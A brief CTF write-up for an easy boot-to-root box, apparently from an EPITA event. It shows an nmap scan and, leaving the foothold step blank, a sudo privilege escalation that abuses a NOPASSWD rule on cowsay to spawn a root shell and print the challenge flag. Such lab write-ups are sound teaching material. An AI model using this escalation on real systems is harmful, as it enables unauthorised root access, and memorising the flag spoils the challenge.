# JI EPITA - CTF

#### Challenge Type : boot to root (box)
#### Difficulty : easy

----

## Writeup

### Enum

Scan the IP using nmap for open ports

```
nmap -p- ip
```

The port 22 and 31337 are open.

We find that there is a web service on port 31337.

### Foothold

...

### Privesc

We can see that the user is allowed tu run `/usr/games/cowsay` as root using sudo without password.

```
User l33t may run the following commands on srv1prod:
    (ALL) NOPASSWD: /usr/games/cowsay, /usr/bin/sudo -l
```

Using gtfo bins, we identified that we can spawn a root shell thanks to this misconfiguration.

[https://gtfobins.github.io/gtfobins/cowsay/](https://gtfobins.github.io/gtfobins/cowsay/)

```
TF=$(mktemp)
echo 'exec "/bin/sh";' >$TF
sudo cowsay -f $TF x
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
epita{th3-sup3r-c0ws4y}
```

Solved !